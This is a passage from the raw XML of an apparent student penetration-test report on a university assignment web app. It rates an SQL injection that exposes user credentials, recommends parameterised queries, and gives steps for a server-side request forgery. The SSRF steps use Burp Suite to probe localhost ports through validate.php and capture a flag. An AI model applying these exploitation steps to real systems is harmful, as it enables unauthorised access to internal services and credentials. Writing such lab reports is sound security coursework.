              <w:t xml:space="preserve">will </w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>enquiry.</w:t>
            </w:r>
            <w:r w:rsidR="003647E1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> As a result, the attacker can obtain login credentials for all users. If an administrator is also saved in this table, this vulnerability will lead to more serious result. For example, an attacker can </w:t>
            </w:r>
            <w:r w:rsidR="006C6219">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>figure out that</w:t>
            </w:r>
            <w:r w:rsidR="003647E1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C6219">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="003647E1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">password </w:t>
            </w:r>
            <w:r w:rsidR="006C6219">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">of our lecturer, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="006C6219">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Sajeeb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="006C6219">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="003647E1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>contains nine characters</w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>, with more work, he can get the correct password</w:t>
            </w:r>
            <w:r w:rsidR="003647E1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00696EC2" w14:paraId="6EE4425E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B7A82A4" w14:textId="78FFC8A0" w:rsidR="00696EC2" w:rsidRDefault="00696EC2">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="_Toc71488326"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25F2CE62" w14:textId="4431895D" w:rsidR="00696EC2" w:rsidRDefault="00696EC2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Possible: </w:t>
            </w:r>
            <w:r w:rsidR="006C6219">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">We see this SQL injection as possible, because only authenticated users can use the find user functionality. If an attacker wants to exploit this vulnerability, firstly, he needs a valid login credentials to authenticate into the web application. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="6C0D35C2" w14:textId="77777777" w:rsidTr="00FF7098">
        <w:trPr>
          <w:trHeight w:val="670"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="47D178DA" w14:textId="6B7733B4" w:rsidR="00B97362" w:rsidRDefault="004939A9">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_Toc71488327"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="8"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4F0E20CD" w14:textId="268385A4" w:rsidR="00B97362" w:rsidRPr="00C10E9D" w:rsidRDefault="006750D3" w:rsidP="00C10E9D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="00C10E9D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="001D1AEB">
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidR="00D705B9">
              <w:t xml:space="preserve">his vulnerability’s impact is major, and likelihood is possible, </w:t>
            </w:r>
            <w:r w:rsidR="001D1AEB">
              <w:t>according to ISO31000 Risk Matrix (</w:t>
            </w:r>
            <w:hyperlink w:anchor="A1" w:history="1">
              <w:r w:rsidR="001D1AEB" w:rsidRPr="00D705B9">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix 1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="001D1AEB">
              <w:t>), the risk rating is high.</w:t>
            </w:r>
            <w:r w:rsidR="00D705B9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED2041" w14:paraId="7161A7C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="192ABAE0" w14:textId="2C0330DF" w:rsidR="00ED2041" w:rsidRDefault="00ED2041">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="9" w:name="_Toc71488328"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="9"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="149C0E62" w14:textId="31F017CE" w:rsidR="001D1AEB" w:rsidRDefault="001D1AEB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/sql-injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="10FA6812" w14:textId="4194CD67" w:rsidR="001D1AEB" w:rsidRDefault="001D1AEB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">2] </w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="174FF473" w14:textId="1D737385" w:rsidR="001D1AEB" w:rsidRDefault="001D1AEB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>3] Lecture 5,6 slides: SQLi; SQL Wildcard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="1164207E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51D432C9" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="10" w:name="_Toc71488329"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="10"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A59E43E" w14:textId="465BCD3B" w:rsidR="00B97362" w:rsidRDefault="007D73B9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prepared statement (with parameterized queries) can help with this vulnerability. This method forces the developer to first define all the SQL code, and then pass in each parameter to the query later. </w:t>
            </w:r>
            <w:r w:rsidR="00CA4C02">
              <w:t>For example:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AD24A8" w14:textId="7919ADB5" w:rsidR="00CA4C02" w:rsidRDefault="00CA4C02">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6929FA3A" wp14:editId="29DBDE14">
                  <wp:extent cx="3609892" cy="5753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6995" cy="578098"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B464EC4" w14:textId="72E37EBA" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="73487929" w14:textId="1B8CE220" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc71488330"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Finding 2 </w:t>
      </w:r>
      <w:r w:rsidR="00FE41E0">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C10E9D">
        <w:t>Server-side Request Forgery in User Profile Page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3E5D106E" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>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7B5DA2" w14:paraId="166B2E90" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="235AA2FF" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="12" w:name="_Toc71488331"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="12"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="672BCD2D" w14:textId="5AD222EB" w:rsidR="007B5DA2" w:rsidRDefault="00381A8D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>In User Profile page, there is SSRF vulnerability. It can be performed by validate website functionality</w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t xml:space="preserve"> by try all possible ports</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t xml:space="preserve">If anything is on one port, the response will contain related information. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Brup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Suite is needed </w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t xml:space="preserve">there </w:t>
            </w:r>
            <w:r>
              <w:t>because th</w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> website does not display the response message directly, but you can see it in Burp Suite.</w:t>
            </w:r>
            <w:r w:rsidR="003D372D">
              <w:t xml:space="preserve"> Python is also fine</w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t xml:space="preserve"> and can work more effectively</w:t>
            </w:r>
            <w:r w:rsidR="003D372D">
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="631CE105" w14:textId="77777777" w:rsidTr="00FF7098">
        <w:trPr>
          <w:trHeight w:val="3010"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28E5FD6A" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="13" w:name="_Toc71488332"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="13"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3832D1F8" w14:textId="2334C592" w:rsidR="00EF2AA4" w:rsidRDefault="004E04E4" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">For a quick access, </w:t>
            </w:r>
            <w:r w:rsidR="00756BC9">
              <w:t xml:space="preserve">open Burp Suite and </w:t>
            </w:r>
            <w:r>
              <w:t>login</w:t>
            </w:r>
            <w:r w:rsidR="00756BC9">
              <w:t xml:space="preserve"> the website</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="003D372D">
              <w:t>visit user profile page (</w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="003D372D" w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/profile.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="003D372D">
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidR="00756BC9">
              <w:t xml:space="preserve"> Input any valid URL in website section, click validate website button</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00EF2AA4">
              <w:t xml:space="preserve">In burp suite, send this request (looks like: </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidR="00EF2AA4" w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/validate.php?web=http://localhost:8873</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00EF2AA4">
              <w:t>) to repeater and modify the request header as below:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F12326" w14:textId="77777777" w:rsidR="00EF2AA4" w:rsidRDefault="00EF2AA4" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A01DA36" wp14:editId="541D1645">
                  <wp:extent cx="3857143" cy="4666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143" cy="466667"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A37A0B4" w14:textId="383764EC" w:rsidR="007B5DA2" w:rsidRDefault="00EF2AA4" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Send out and we will get the flag in the response. </w:t>
            </w:r>
            <w:r w:rsidR="004E04E4">
              <w:t xml:space="preserve">For a detailed walkthrough and </w:t>
            </w:r>
            <w:r>
              <w:t>flag screenshot</w:t>
            </w:r>
            <w:r w:rsidR="004E04E4">
              <w:t xml:space="preserve">, see </w:t>
            </w:r>
            <w:hyperlink w:anchor="A2_s2" w:history="1">
              <w:r w:rsidR="004E04E4" w:rsidRPr="00381A8D">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t xml:space="preserve">Appendix 2, Section </w:t>
              </w:r>
              <w:r w:rsidR="00381A8D" w:rsidRPr="00381A8D">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>2</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C10E9D">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="7FF4F27A" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65F16F88" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="_Toc71488333"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="14"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A5091C3" w14:textId="6A5CC640" w:rsidR="007B5DA2" w:rsidRDefault="00381A8D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Major: </w:t>
            </w:r>
            <w:r w:rsidR="00667EC7">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">This vulnerability is very serious, because an attacker can access all local files saved in server. It can cause sensitive information leakage, and thus lead to more terrible results. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="5A849D4F" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="73073046" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="15" w:name="_Toc71488334"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="15"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75D3D44E" w14:textId="10FC8DEC" w:rsidR="007B5DA2" w:rsidRDefault="00381A8D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Possible: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">We see this </w:t>
            </w:r>
            <w:r w:rsidR="00667EC7">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SSRF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> as possible, because only authenticated users can use </w:t>
            </w:r>
            <w:r w:rsidR="00667EC7">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>validate website</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> functionality. If an attacker wants to exploit this vulnerability, firstly, he needs a valid login credentials to authenticate into the web application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="2E16BD2D" w14:textId="77777777" w:rsidTr="007D7D0E">
        <w:trPr>
          <w:trHeight w:val="894"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
